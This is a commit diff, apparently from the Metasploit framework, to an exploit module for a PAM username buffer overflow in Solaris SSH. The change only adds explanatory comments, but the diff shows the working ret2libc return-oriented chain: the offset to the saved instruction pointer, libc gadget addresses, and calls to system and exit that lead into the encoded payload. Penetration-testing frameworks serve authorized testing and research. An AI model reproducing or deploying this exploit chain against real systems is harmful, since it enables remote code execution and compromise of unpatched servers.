Update pam_username_bof.rb

rapid7 · Aug 9, 2023 · 03c9966 · 03c9966
1 parent 9404963
commit 03c9966
Showing 1 changed file with 4 additions and 4 deletions.
diff --git a/modules/exploits/solaris/ssh/pam_username_bof.rb b/modules/exploits/solaris/ssh/pam_username_bof.rb
@@ -117,16 +117,16 @@ def exploit
     # Do nothing on success
   end
 
-  # XXX: No ASLR, but libc base changes...
+  # XXX: No ASLR, but NX stack and libc base changes...
   def ret2libc
-    buf = rand_text(516)
+    buf = rand_text(516) # Offset to saved EIP
     buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret
-    buf << rand_text(4)
+    buf << rand_text(4) # Padding
     buf << p32(0x08040101) # ecx
     buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret
     buf << p32(target['LibcBase'] + 0x256d0) # exit(3)
     buf << p32(target['LibcBase'] + 0x91edf) # system(3)
-    buf << rand_text(4)
+    buf << rand_text(4) # Padding
     buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret
     buf << payload.encoded
   end